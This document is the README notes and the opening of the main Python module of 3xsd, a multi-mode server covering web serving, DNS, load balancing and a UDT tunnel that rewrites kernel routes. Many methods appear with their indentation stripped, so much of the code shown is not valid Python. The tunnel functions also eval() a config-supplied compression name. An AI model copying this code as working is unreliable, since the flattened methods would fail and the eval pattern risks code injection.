Probably you need this easy-install.pth file in python's site-packages dir:
import sys; sys.__plen = len(sys.path)
./pycrypto-2.6.1-py2.6-linux-x86_64.egg
./pyudt4-0.6.0-py2.6-linux-x86_64.egg
import sys; new=sys.path[sys.__plen:]; del sys.path[sys.__plen:]; p=getattr(sys,'__egginsert',0); sys.path[p:p]=new; sys.__egginsert = p+len(new)
I provide pre-compiled package [pyudt_tun-centos6-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun-centos6-x86_64.tar.gz) and [pyudt_tun_lzo-centos7-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun_lzo-centos7-x86_64.tar.gz) to simplify
the installation procedure of pyudt4 & python-pytun.
Be aware of pyudt4 having some bugs, you'd better download it's source code of epoll-fixes branch and
apply the patch I offered. See changelog.txt v0.0.20 2016.03.07 fixed section for detail.
(Already included in [pyudt_tun-centos6-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun-centos6-x86_64.tar.gz) and [pyudt_tun_lzo-centos7-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun_lzo-centos7-x86_64.tar.gz))
Or, of cause you can let pip do it all for you(not including patching pyudt4):
pip install 3xsd
In a debian, you can use apt-get to install python-pip(pip) or python-setuptools(easy_install),
then to install the packages following.
Python Packages(Modules) version reference:
gevent==0.13.8(1.0.1, 1.1)
greenlet==0.4.2
pysendfile==2.0.1
setproctitle==1.0.1
psutil==0.6.1
dpkt==1.6(1.8.6)
python-pytun==2.2.1
pyudt4==0.6.0(epoll-fixes branch)
pycrypto==2.6.1
python-lzo==1.8
System libs version reference:
libevent-1.4.13-4(not actually used, just needed for gevent to function)
udt-4.11-6
lzo-2.03-3.1
To install a module of specific version(like gevent 0.13.8), you can:
pip install gevent==0.13.8
This will install the latest version of gevent(pypy will need it):
pip install git+git://github.com/surfly/gevent.git#egg=gevent
| 3xsd | /3xsd-0.0.26.tar.gz/3xsd-0.0.26/README.md | README.md |
__version__ = "0.0.26"
import os, sys, io, time, calendar, random, multiprocessing, threading
import shutil, mmap, sendfile, zlib, gzip, lzo, copy, setproctitle
import _socket as socket
import select, errno, gevent, dpkt, ConfigParser, hashlib, struct, shelve
import pytun, udt4, subprocess, fcntl, geoip2.database
from distutils.version import StrictVersion
from datetime import datetime
from collections import deque
from gevent.server import StreamServer
from gevent.coros import Semaphore
from udt4 import pyudt as udt
from Crypto.Cipher import AES
from Crypto.Cipher import Blowfish
from Crypto.Util import Counter
from Crypto import Random
# --- Module-level runtime configuration, overwritten at startup from the conf file ---
Port = 8000 #TCP/UDP port number the server listens on
Backlog = 1000 #listen() backlog length
Conns = None #gevent.pool type, connection limit
Workers = 0 #number of worker processes to fork, 0 for no worker
Homedir = None #3xsd working home (document root)
Handler = None #3xsd handler class (not an instance); instantiated per connection/event batch
Server = None #3xsd server instance, init at startup
X_shelf = 0 #1 enables persistent (shelve) storage of xcache (3zsd & 3fsd)
Z_mode = 0 #backend scheduling for 3zsd: 0 - RR(default), 1 - IP Hash, 2 - URL Hash
_Name = '3xsd' #program/process title, changed at startup per sub-server mode
# Keep references to the original socket module and sendfile function so they
# remain usable even after gevent monkey-patching replaces socket.socket.
o_socket = socket
o_sendfile = sendfile.sendfile
def Handle_Gevent_Stream(sock, addr):
    """Per-connection callback used by the gevent StreamServer mode.

    Instantiates the module-global Handler class for each accepted
    connection; the instance does all the work in its __init__.
    """
    #Handler __init__, pass params with no name, can help boosting call procedure
    Handler(sock, addr, Server, False, True)
class _Z_StreamServer(StreamServer):
    """gevent StreamServer subclass used for the pure-gevent serving mode.

    Thin wrapper that bridges API differences between gevent 0.13.x and
    1.x (pre_start vs init_socket, _stop_event vs _stopped_event).
    """
    workers = 0        #number of worker processes to fork, 0 for none
    _worker_id = 0     #0 for the master process, 1..workers for workers
    xcache = {}        #in-memory content cache shared with the handler
    x_reqs = {}        #per-connection pending request state
    max_accept = 500   #max accepts per loop iteration (gevent setting)
    server_mode = ''   #sub-server mode name, set at startup
    zlb_mode = False   #True when acting as load-balancer (3zsd/3fsd)
    def __init__(self, server_address, RequestHandlerClass, backlog=1000, spawn=None):
        StreamServer.__init__(self, server_address, RequestHandlerClass, backlog=backlog, spawn=spawn)
        if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
            #gevent 1.x renamed the stop event; keep the old attribute name alive
            self._stopped_event = self._stop_event
    def pre_start(self):
        """Bind/listen the socket, using whichever API this gevent version has."""
        if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
            StreamServer.init_socket(self)
        else:
            StreamServer.pre_start(self)
    def master_works(self):
        #obsolete
        if hasattr(socket, "SO_REUSEPORT"):
            self.socket.close()
class _Z_EpollServer(StreamServer):
    """epoll-driven multi-mode server core.

    Subclasses gevent's StreamServer only for its construction plumbing;
    the actual event loops (serve_forever/serve_dns/serve_lbs) drive
    select.epoll directly. One instance acts as 3wsd (web), 3nsd (dns),
    3zsd/3fsd (proxy/dfs) or 3wdd (udt tunnel), depending on server_mode
    and the handler class it is given.
    """
    workers = 0          #number of forked worker processes, 0 for single process
    _worker_id = 0       #0 for master, 1..workers for worker processes
    max_accept = 500
    reuse_port = True    #use SO_REUSEPORT when the kernel supports it
    server_mode = b''
    zlb_mode = False     #True when acting as load-balancer front-end
    _fds = []            #per-batch (fd, op-code) work list handed to the handler
    epoll = None         #select.epoll instance, created in the serve_* loops
    #for 3wsd - web server
    conns = {}           #fd -> accepted client socket
    addrs = {}           #fd -> client address tuple
    xcache = {}          #in-memory content cache
    xcache_stat = {}
    x_reqs = {}          #fd -> pending/partial request data
    resume = {}
    gzip_shelf = None            #persistent storage of gzipped files
    gzip_shelf_lock = None       #guards gzip_shelf.dict.sync()
    _gzs = {}
    #for 3zsd - z server
    cb_conns = {}        #client fd <-> backend fd pairing
    k_conns = {}
    zconns = {}          #fd -> backend (z) socket
    zidles = {}          #backend host -> list of idle backend fds
    zconns_stat = {}
    zaddrs = {}
    zhosts = {}
    zcache = {}
    zcache_stat = {}
    z_reqs = {}
    z_reqs_stat = {}
    z_reqs_cnt = {}
    z_resp_header = {}
    z_path = {}
    c_path = {}
    xcache_shelf = None          #persistent storage of xcache entries
    xcache_shelf_lock = None     #guards xcache_shelf.dict.sync()
    #for 3wdd - warp drive
    zsess = {} #session <-> (tun, udt socket)
    ztuns = {} #tunnels & fd
    s_tuns = {} #sessions connected with tuns
    s_udts = {} #sessions connected with udts
    upolls = [] #the udt socket & tun epolls
    udt_send_buf = {}
    udt_thread_limit = 0
    udt_conns_cnt = {}           #worker id -> shared connection counter
    udt_conns_cnt_lock = None
    udt_conn_port = None         #shared next-port value for udt connects
    udt_conn_port_lock = None
    def __init__(self, server_address, RequestHandlerClass, backlog=1000, spawn=None,
                tcp=True, udt=False, recv_buf_size=16384, send_buf_size=65536):
        """Configure socket buffer sizes and (for UDT) shared worker state.

        Modes: tcp=True -> TCP server (3wsd/3zsd/3fsd);
        tcp=False, udt=False -> UDP server (3nsd dns);
        udt=True -> UDT 'warp drive' tunnel server (3wdd).
        The listening socket itself is created later in init_socket().
        """
        if tcp:
            self.recv_buf_size = recv_buf_size
            self.send_buf_size = send_buf_size
        elif udt:
            #this buffer size is about 100Mbps bandwidth between CN&US(Bandwidth*RTT/8)
            self.recv_buf_size = 2760000
            self.send_buf_size = 2760000
            #udt not work with reuse_port option
            self.reuse_port = False
            #self.udt_thread_limit = multiprocessing.cpu_count()
            self.udt_thread_limit = 1 #set thread_limit to 1 for the GIL
            #shared counters so master & workers can see each other's connection load
            self.udt_conns_cnt_lock = multiprocessing.Lock()
            for i in xrange(Workers + 1):
                self.udt_conns_cnt[i] = multiprocessing.Value('i', 0, lock=self.udt_conns_cnt_lock)
            self.udt_conn_port_lock = multiprocessing.Lock()
            self.udt_conn_port = multiprocessing.Value('i', Port, lock=self.udt_conn_port_lock)
        else:
            self.recv_buf_size = 65536
            self.send_buf_size = 65536
        self.tcp = tcp
        self.udt = udt
        StreamServer.__init__(self, server_address, RequestHandlerClass, backlog=backlog, spawn=spawn)
        #handler instance bound to no connection; used for setup & event dispatch
        self.handler = RequestHandlerClass(None, None, self)
        if hasattr(socket, "SO_REUSEPORT"):
            print("Good, this kernel has SO_REUSEPORT support")
def master_works(self):
if hasattr(socket, "SO_REUSEPORT") and self.reuse_port and not self.udt:
#close master process's listening socket, because it never serving requests
self.socket.close()
    def pre_start(self):
        """Create/bind the listening socket before workers are forked."""
        self.init_socket(tcp=self.tcp)
def set_socket_buf(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.recv_buf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.send_buf_size)
    def init_socket(self, tcp=True):
        """Create, configure, bind and listen on the server socket.

        tcp=True builds a TCP listener; tcp=False builds either a UDP
        socket (dns mode) or a UDT listener (warp-drive mode, self.udt).
        Sets self.socket, self.socket_fileno and, for udp, handler.sock.
        """
        if tcp:
            if self.server_mode == 'z_lbs' or self.server_mode == 'x_dfs':
                self.zlb_mode = True
            self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        else:
            if not self.udt:
                #i_dns mode
                #monkey-patch the module-level socket class so later socket
                #creations are gevent-cooperative
                socket.socket = gevent.socket.socket
                self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
        if not self.udt:
            if self.reuse_addr == 1:
                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            if hasattr(socket, "SO_REUSEPORT") and self.reuse_port:
                #good, this kernel has SO_REUSEPORT support
                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
            self.set_socket_buf()
            if tcp:
                #defer accept until the client actually sends data
                self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_DEFER_ACCEPT, 1)
            self.socket.bind(self.address)
            self.socket.setblocking(0)
            self.socket_fileno = self.socket.fileno()
            if tcp:
                self.socket.listen(self.backlog)
            else:
                #udp: hand the socket to the dns handler directly
                self.handler.sock = self.socket
        else:
            if self._worker_id == 0 and self.workers > 0:
                #delay socket init for udt worker
                self.socket = None
                return
            udt4.startup()
            if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
                self.socket = udt.UdtSocket()
                #if self.reuse_addr == 1:
                #	self.socket.setsockopt(udt4.UDT_REUSEADDR, True) #default on
                #self.socket.setsockopt(udt4.UDT_MSS, 9000)  #default 1500
                self.socket.setsockopt(udt4.UDT_RCVBUF, self.recv_buf_size)  #default 10MB
                self.socket.setsockopt(udt4.UDT_SNDBUF, self.send_buf_size)  #default 10MB
                if self.workers > 0:
                    #each udt worker listens on its own consecutive port
                    _ip, _port = self.address
                    _port = _port + self._worker_id - 1
                    self.address = (_ip, _port)
                self.socket.bind(self.address)
                self.socket.listen(self.backlog)
            else:
                #pure client ('client' wdd_mode): no listening socket at all
                self.socket = None
def cleanupall(self):
if self.tcp:
self.epoll.unregister(self.socket.fileno())
self.epoll.close()
self.conns.clear()
self.addrs.clear()
self.xcache.clear()
self.x_reqs.clear()
    def cleanup(self, fd):
        """Best-effort teardown of one client connection (3wsd side).

        Unregisters fd from epoll, closes its socket and drops the
        per-connection state. Both steps deliberately swallow all errors:
        the fd may already be gone. Note the second block pops without a
        default, so if fd is missing from self.conns the remaining pops
        are skipped by the exception.
        """
        try:
            self.epoll.unregister(fd)
            self.conns[fd].close()
        except:
            pass
        try:
            self.conns.pop(fd)
            self.addrs.pop(fd)
            self.x_reqs.pop(fd)
        except:
            pass
    def cleanz(self, fd):
        """Best-effort teardown of one backend (z) connection.

        Breaks the client<->backend pairing in cb_conns and drops every
        per-backend table entry keyed by fd. The socket itself is closed
        elsewhere (see the inline note below).
        """
        try:
            self.epoll.unregister(fd)
        except IOError as e:
            pass
        try:
            #clean c-z pair in cb_conns
            if self.cb_conns.get(fd, None):
                self.cb_conns[self.cb_conns[fd][1]] = None
            self.cb_conns[fd] = None
            #NOTE(review): sets a server-wide flag, not per-connection -- presumably
            #forces the handler to close instead of keep-alive; confirm with handler code
            self.keep_connection = 0
            #self.zconns[fd].close() #will be closed by clean()
            self.cb_conns.pop(fd, None)
            self.zconns.pop(fd, None)
            self.zconns_stat.pop(fd, None)
            self.zaddrs.pop(fd, None)
            self.z_reqs.pop(fd, None)
            self.z_reqs_cnt.pop(fd, None)
            self.z_reqs_stat.pop(fd, None)
            self.zhosts.pop(fd, None)
            self.zcache.pop(fd, None)
            self.zcache_stat.pop(fd, None)
            self.z_resp_header.pop(fd, None)
            self.z_path.pop(fd, None)
        except:
            pass
def clean_zidles(self, fd):
for _host, _idle_list in self.zidles.iteritems():
if fd in _idle_list:
self.zidles[_host].remove(fd)
    def cleanc(self, fd):
        """Best-effort teardown of one client connection (lbs/dfs side).

        Mirror of cleanz() for the client end: breaks the cb_conns pairing
        and drops the client-side tables keyed by fd.
        """
        try:
            self.epoll.unregister(fd)
        except IOError as e:
            pass
        try:
            if self.cb_conns.get(fd, None):
                self.cb_conns[self.cb_conns[fd][1]] = None
            self.cb_conns[fd] = None
            #NOTE(review): server-wide flag, same caveat as in cleanz()
            self.keep_connection = 0
            self.c_path.pop(fd, None)
            self.k_conns.pop(fd, None)
        except:
            pass
def o_stack(self, o=None):
if o == None:
return
elif o == "resume":
print self.resume
elif o == "zconns":
print self.zconns
elif o == "cb_conns":
print self.cb_conns
elif o == "xcache":
print self.xcache
elif o == "zcache":
print self.zcache
elif o == "zcache_stat":
print self.zcache_stat
elif o == "z_path":
print self.z_path
elif o == "z_resp_header":
print self.z_resp_header
def o_udts(self):
print "-------------------------------------"
print "conns", self.conns
print "zsess", self.zsess
print "ztuns", self.ztuns
print "s_tuns", self.s_tuns
print "s_udts", self.s_udts
print "upolls", self.upolls
print "udt_send_buf", self.udt_send_buf
    def o_mem(self):
        """Memory-debug hook; the meliae object-dump code is disabled."""
        #if os.path.exists('/tmp/3wdd_dumpit'):
        #	scanner.dump_all_objects('/tmp/3wdd_dump.txt')
        pass
    def check_3ws(self):
        """Background maintenance loop for the 3wsd gzip shelf.

        Every 15s: trims the in-memory cache of the gzip shelf back toward
        1000 entries (full clear when more than 1000 over the cap, batch
        popitem when moderately over) and syncs the underlying dbm file to
        disk under the shelf lock. Errors are deliberately swallowed so the
        maintenance thread never dies.
        """
        while 1:
            try:
                if self.handler.gzip_on and self.gzip_shelf and self.gzip_shelf.cache:
                    _over = len(self.gzip_shelf.cache) - 1000
                    _delx = int(_over/8)
                    if _over > 1000:
                        self.gzip_shelf.cache.clear()
                    elif _over > 0 and _delx > 9:
                        while _delx > 0:
                            self.gzip_shelf.cache.popitem()
                            _delx -= 1
                    if hasattr(self.gzip_shelf.dict, 'sync'):
                        #self.gzip_shelf.dict is an anydbm object, mostly gdbm or bsddb
                        with self.gzip_shelf_lock:
                            self.gzip_shelf.dict.sync()
                    #print self.xcache
            except:
                pass
            time.sleep(15)
def get_tcp_stat(self, sock):
_fmt = "B"*7+"I"*21
_x = struct.unpack(_fmt, sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_INFO, 92))
return _x[0]
    def check_lbs(self):
        """Background maintenance loop for 3zsd/3fsd load-balancer state.

        Every 15s: trims and syncs the persistent xcache shelf (same scheme
        as check_3ws), then reaps dead sockets -- backend connections that
        are closed or no longer in TCP ESTABLISHED state, and client
        connections whose fd is already -1. Errors are deliberately
        swallowed so the maintenance thread never dies.
        """
        while 1:
            try:
                #maintain mem caches & shelfies
                if self.handler.z_xcache_shelf and self.xcache_shelf and self.xcache_shelf.cache:
                    _over = len(self.xcache_shelf.cache) - self.handler.z_cache_size
                    _delx = int(_over/8)
                    if _over > self.handler.z_cache_size:
                        self.xcache_shelf.cache.clear()
                    elif _over > 0 and _delx > 9:
                        while _delx > 0:
                            self.xcache_shelf.cache.popitem()
                            _delx -= 1
                    if hasattr(self.xcache_shelf.dict, 'sync'):
                        #self.xcache_shelf.dict is an anydbm object, mostly gdbm or bsddb
                        with self.xcache_shelf_lock:
                            self.xcache_shelf.dict.sync()
                #maintain backend conns
                #print "------------------------------------------"
                #print "conns:", self.conns
                #print "zconns:", self.zconns
                #print "cb_conns:", self.cb_conns
                #print "zidles:", self.zidles
                _keys = self.zconns.keys()
                if _keys:
                    for _f in _keys:
                        if self.zconns[_f].fileno() == -1 or self.get_tcp_stat(self.zconns[_f]) != 1:
                            #connection not in ESTABLISHED stat, being closed
                            self.clean_zidles(_f)
                            self.cleanz(_f)
                _keys = self.conns.keys()
                if _keys:
                    for _f in _keys:
                        if self.conns[_f].fileno() == -1:
                            #client connection being closed
                            #NOTE(review): pop() without default -- a missing key aborts
                            #this sweep via the outer except until the next cycle
                            self.conns.pop(_f)
                            self.cb_conns.pop(_f)
            except:
                pass
            time.sleep(15)
    def handle_event(self, events):
        """Dispatch one batch of epoll events.

        New connections on the listening fd are accepted and registered;
        all other fds are collected into self._fds as (fd, op) pairs and
        handed to the handler in one call. Op codes: 0 read / 1 write for
        client sockets, 2 read / 3 write for backend (zconns) sockets.
        """
        for f, ev in events:
            if f == self.socket_fileno:
                #new connection..
                try:
                    #multi workers to accept same connection, only one can get it
                    conn, addr = self.socket.accept()
                except:
                    continue
                c = conn.fileno()
                #conn.setblocking(0)
                #self.epoll.register(c, select.EPOLLIN | select.EPOLLET)
                self.epoll.register(c, select.EPOLLIN)
                self.conns[c] = conn
                self.addrs[c] = addr
            elif ev & select.EPOLLIN:
                #read event..
                if f not in self.zconns:
                    self._fds.append((f, 0))
                else:
                    self._fds.append((f, 2))
            elif ev & select.EPOLLOUT:
                #write event..
                if f not in self.zconns:
                    self._fds.append((f, 1))
                else:
                    self._fds.append((f, 3))
            elif ev & select.EPOLLHUP:
                #connection closed..
                self.cleanup(f)
        if len(self._fds) > 0:
            #we have works to do, call handler
            self.handler(self._fds)
            del self._fds[:]
def if_reinit_socket(self):
if hasattr(socket, "SO_REUSEPORT") and self.reuse_port and self.workers > 0:
self.init_socket(tcp=self.tcp)
elif self.udt and self.workers > 0:
self.init_socket(tcp=self.tcp)
def serve_forever(self):
#see if reinit socket is neccessary
self.if_reinit_socket()
#single master gets an epoll, multi workers get multi epolls
self.epoll = select.epoll()
#register fd and events to poll
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
def serve_dns(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN | select.EPOLLET)
try:
gevent.spawn(self.handler.probe_ips) #a separate greenlet to perform ip stat checking
while 1:
gevent.sleep(1e-20) #a smallest float, works both at v0.13.8 and v1.0.x
_events = self.epoll.poll(10) #long-timeout helping cpu% lower
if len(_events) > 0:
self.handler(_events)
finally:
self.cleanupall()
self.socket.close()
def serve_lbs(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
t = threading.Timer(15, self.check_lbs)
t.start()
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
	def serve_wds(self): #www
		"""Entry point for 3wdd tunnel mode.

		Depending on self.handler.wdd_mode ('client', 'server' or 'hybird'
		- sic, the config keyword is spelled that way), this spawns one
		dialing thread per locally-initiated session, a check_3wd
		maintenance thread, and/or an accept loop for incoming UDT
		connections.  Pure client workers just park the main thread.
		"""
		try:
			#pre-size upolls: one (lazily created) udt epoll slot per event thread
			s = 0
			while s < self.udt_thread_limit:
				self.upolls.append(None)
				s += 1
			if self.handler.wdd_mode == 'client' or self.handler.wdd_mode == 'hybird':
				if 1:
					_idx = -1
					for _session in self.handler.wdd_dial:
						_idx += 1
						#sessions are distributed round-robin over workers
						if self.workers > 1 and (_idx % self.workers) + 1 != self._worker_id:
							continue
						if _session in self.handler.client_session:
							t = threading.Thread(target=self.handler.connect_udt_server, args=(_session,))
							t.daemon = True
							t.start()
			#background maintenance: redials dead tunnels, updates route metrics
			t = threading.Thread(target=self.check_3wd, args=())
			t.daemon = True
			t.start()
			if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
				self.if_reinit_socket()
				while 1:
					#accept incoming udt connection
					_conn, _addr = self.socket.accept()
					#launch setting up udt_tunnel
					t = threading.Thread(target=self.handler.setup_udt_connection, args=(_conn,_addr,))
					t.start()
			if self.handler.wdd_mode == 'client':
				#nothing to accept in pure client mode; keep the main thread alive
				while 1:
					time.sleep(1000)
		except:
			raise
		finally:
			if self.socket:
				self.socket.close()
def serve_3ws(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
t = threading.Timer(15, self.check_3ws)
t.start()
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
def handle_event_udt_tun(self, index):
try:
while 1:
self.handler.handle_udt_tun_events(self.upolls[index].wait(True, True, -1, True))
except:
if self.upolls[index]:
self.upolls[index] = None
raise
	def forward_tun_udt(self, _tun, _usock, _encrypt_mode, _compress, _session): #uuu
		#One direction of a tunnel: read IP packets from the local tun device
		#and push them over the UDT socket, optionally compressed+encrypted.
		#NOTE(security): _compress comes from config and is eval'ed to get the
		#module object (e.g. zlib); it must never carry untrusted input.
		#packets near the mtu are sent uncompressed to avoid expansion
		_zip = lambda s : eval(_compress).compress(s) if _compress and len(s) < _tun.mtu - 100 else s
		#each datagram is length-prefixed with a 16bit big-endian size
		_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
		_forward_it=lambda s : _usock.send(_repack(self.handler.encrypt_package(_zip(s), _encrypt_mode, _session))) if _encrypt_mode else _usock.send(_repack(_zip(s)))
		try:
			while 1:
				r = [_tun]; w = []; x = []; _b = None
				r, w, x = select.select(r, w, x, 6.0)
				if r:
					_forward_it(_tun.read(_tun.mtu))
				else:
					#select timed out: check whether the tun device is gone
					if _tun.fileno() == -1:
						#tunnel down
						print "Thread forward_tun_udt of tunnel:", _session, "exit.."
						break
		except:
			print "Thread forward_tun_udt of tunnel", _session, "exit.."
			raise
	def forward_udt_tun(self, _tun, _usock, _encrypt_mode, _compress, _session): #ttt
		#Opposite direction: receive length-prefixed datagrams from the UDT
		#socket, optionally decrypt+decompress, and write them into the tun
		#device.  The magic-byte table detects whether a payload was
		#compressed (zlib/lzo headers).
		_magic = {'zlib':(''.join([chr(0x78), chr(0x9c)]), 2), 'lzo':(''.join([chr(0xf0), chr(0x0), chr(0x0)]), 3)}
		#NOTE(security): _compress comes from config and is eval'ed to get the
		#module object; it must never carry untrusted input.
		_unzip = lambda s : eval(_compress).decompress(s) if _compress and _magic[_compress][0] in s[:_magic[_compress][1]] else s
		_forward_it = lambda s : _tun.write(_unzip(self.handler.decrypt_package(s, _encrypt_mode, _session))) if _encrypt_mode else _tun.write(_unzip(s))
		try:
			while 1:
				#first 2 bytes carry the payload length, then the payload itself
				_forward_it(_usock.recv(struct.unpack('!H', _usock.recv(2))[0]))
		except IOError as e:
			if e.errno == errno.EINVAL:
				#illegal data, maybe tunnel peer shutdown suddenly
				_usock.close()
			print "Thread forward_udt_tun of tunnel", _session, "exit.."
			raise
		except:
			print "Thread forward_udt_tun of tunnel", _session, "exit.."
			raise
def forward_udt_relay(self, _usock, _session):
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
_from, _to = self.handler.udt_relay[_session]
_relay_session = None
_first = True
while not _relay_session:
if _session == _from:
self.handler.udt_relay_thread_stat[_from] = True
_relay_session = self.zsess.get(_to, None)
else:
self.handler.udt_relay_thread_stat[_to] = True
_relay_session = self.zsess.get(_from, None)
if _first:
_first = False
else:
time.sleep(5)
else:
_to_usock = _relay_session[1]
while 1:
_to_usock.send(_repack(_usock.recv(struct.unpack('!H', _usock.recv(2))[0])))
except:
if _session == _from:
self.handler.udt_relay_thread_stat[_from] = False
else:
self.handler.udt_relay_thread_stat[_to] = False
print "Thread forward_udt_relay of tunnel", _session, "exit.."
raise
	def check_3wd(self): #333
		"""Maintenance loop for 3wdd tunnel mode, one pass every 20 seconds.

		Each pass: redials broken client tunnels, reaps broken server
		tunnels, records per-session RTT, rebalances workers, relaunches
		stopped relay threads, and (when routing_metric is on) rewrites
		kernel routes so each route's default dev is the lowest-metric
		tunnel.
		"""
		try:
			while 1:
				time.sleep(20)
				_tun, _usock, _addr = [None, None, None]
				if (self.handler.wdd_mode == 'client' or self.handler.wdd_mode == 'hybird'):
					_idx = -1
					for _session in self.handler.wdd_dial:
						_idx += 1
						#sessions are distributed round-robin over workers
						if self.workers > 1 and (_idx % self.workers) + 1 != self._worker_id:
							continue
						if _session in self.handler.client_session:
							_redial = False
							_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
							if _usock:
								#{INIT = 1, OPENED, LISTENING, CONNECTING, CONNECTED, BROKEN, CLOSING, CLOSED, NONEXIST}
								if _usock.getsockstate() > 5: #connection gone
									self.handler.destroy_tunnel(_session)
									_redial = True
								else:
									self.handler.tun_rtt[_session]= _usock.perfmon().msRTT
							else:
								#must connect failed before
								_redial = True
							if _redial:
								t = threading.Thread(target=self.handler.connect_udt_server, args=(_session,))
								t.daemon = True
								t.start()
				if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
					for _session in self.handler.connected.keys():
						if _session not in self.handler.wdd_dial or _session not in self.handler.client_session:
							#server connection
							_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
							if _usock:
								if _usock.getsockstate() > 5: #connection gone
									self.handler.destroy_tunnel(_session)
								else:
									self.handler.tun_rtt[_session]= _usock.perfmon().msRTT
									#debug aid: touch /tmp/usock_stat to dump udt counters
									if os.path.exists('/tmp/usock_stat'):
										udt4.dump_perfmon(_usock.perfmon())
				if self.workers > 1:
					#publish the least-loaded worker's port for redirection
					self.wdd_idle_worker(9000)
				for _session in self.handler.udt_relay:
					if _session in self.handler.udt_relay_thread_stat and not self.handler.udt_relay_thread_stat[_session]:
						#relaunch the udt relay thread, due to one side may be downed before
						_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
						if _usock:
							print "Re-launching relay tunnel", _session
							if self.handler.io_mode == self.handler.IO_NONBLOCK:
								#non-blocking: hook the usock into the per-thread udt epoll slot
								_n = _usock.UDTSOCKET.UDTSOCKET % self.udt_thread_limit
								if self.upolls[_n] is None:
									self.upolls[_n] = udt.Epoll()
									self.upolls[_n].add_usock(_usock, udt4.UDT_EPOLL_IN)
									t = threading.Thread(target=self.handle_event_udt_tun, args=(_n,))
									t.daemon = True
									t.start()
								else:
									self.upolls[_n].add_usock(_usock, udt4.UDT_EPOLL_IN)
								self.handler.udt_relay_thread_stat[_session] = True
							else:
								#blocking: dedicated forwarding thread per direction
								t = threading.Thread(target=self.forward_udt_relay,args=(_usock,_session,))
								t.daemon = True
								t.start()
				if self.handler.routing_metric:
					with open(os.devnull, 'w') as devnull:
						for _route in self.handler.route_metric:
							if len(self.handler.route_metric[_route]) > 1:
								#several tunnels can carry this route: pick the best
								_target_session = None
								_target_session_rtt = -1
								_fixed_metric = 0 #0 for dynamic, >0 for fixed
								for _session in self.handler.route_metric[_route]:
									if _route in self.handler.route_metric_fixed:
										if _session in self.handler.route_metric_fixed[_route]:
											_fixed_metric = self.handler.route_metric_fixed[_route][_session]
										else:
											_fixed_metric = 0
									if _session in self.handler.tun_rtt:
										#metric = RTT in tenths of ms, minimum 1
										_rtt_old=self.handler.route_metric[_route][_session]
										_rtt = self.handler.route_metric[_route][_session] = int(self.handler.tun_rtt[_session] * 10)
										if _rtt == 0:
											_rtt = self.handler.route_metric[_route][_session] = 1
										if _target_session_rtt == -1:
											if _fixed_metric > 0:
												_target_session_rtt = _fixed_metric
											else:
												_target_session_rtt = _rtt
											_target_session = _session
										else:
											if _fixed_metric > 0:
												if _target_session_rtt > _fixed_metric:
													_target_session_rtt = _fixed_metric
													_target_session = _session
											elif _target_session_rtt > _rtt:
												_target_session_rtt = _rtt
												_target_session = _session
										#refresh this tunnel's metric route in the kernel
										subprocess.call(['ip', 'route', 'del', _route, 'metric', str(_rtt_old), 'dev', ''.join([_session, '.', str(self._worker_id)])], stderr=devnull)
										subprocess.call(['ip', 'route', 'add', _route, 'metric', str(_rtt), 'dev', ''.join([_session, '.', str(self._worker_id)])], stderr=devnull)
								if _target_session:
									#change the default outgoing path(dev) for a route
									subprocess.call(['ip', 'route', 'replace', _route, 'metric', str('0'), 'dev', ''.join([_target_session, '.', str(self._worker_id)])], stderr=devnull)
									_rtch_script = self.handler.rtch_script.get(_target_session, None)
									if _rtch_script:
										subprocess.call([_rtch_script, ''.join([_target_session, '.', str(self._worker_id)])], stderr=devnull)
							else:
								#only one path, no need to change
								continue
				del _tun
				del _usock
				del _addr
				self.o_mem()
		except:
			raise
def wdd_idle_worker(self, port): #iii
conns = -1
worker_id = -1
#assume that more than 1 worker
for _worker_id, _conns in self.udt_conns_cnt.items():
if _worker_id == 0: continue
if conns == -1:
conns = _conns.value
worker_id = _worker_id
else:
if conns > _conns.value:
#locate the least connection worker
conns = _conns.value
worker_id = _worker_id
if self.udt_conns_cnt[port - Port + 1].value > conns:
#orig worker has more conns than the least one, redirect to new worker
#print "to new server", conns, worker_id
self.udt_conn_port.value = worker_id + Port -1
else:
#no need to redirect
#print "keep server", conns, worker_id
self.udt_conn_port.value = port
return self.udt_conn_port.value
class _xHandler:
	"""Base HTTP request handler for 3wsd web-server mode.

	One handler instance is attached to a server and re-initialized
	(init_handler) per request/event; the class attributes below hold
	protocol constants and per-process configuration parsed from
	3xsd.conf by init_config().
	"""
	#HTTP protocol version strings and flags
	http_version_11 = "HTTP/1.1"
	http_version_10 = "HTTP/1.0"
	HTTP11 = 1
	HTTP10 = 0
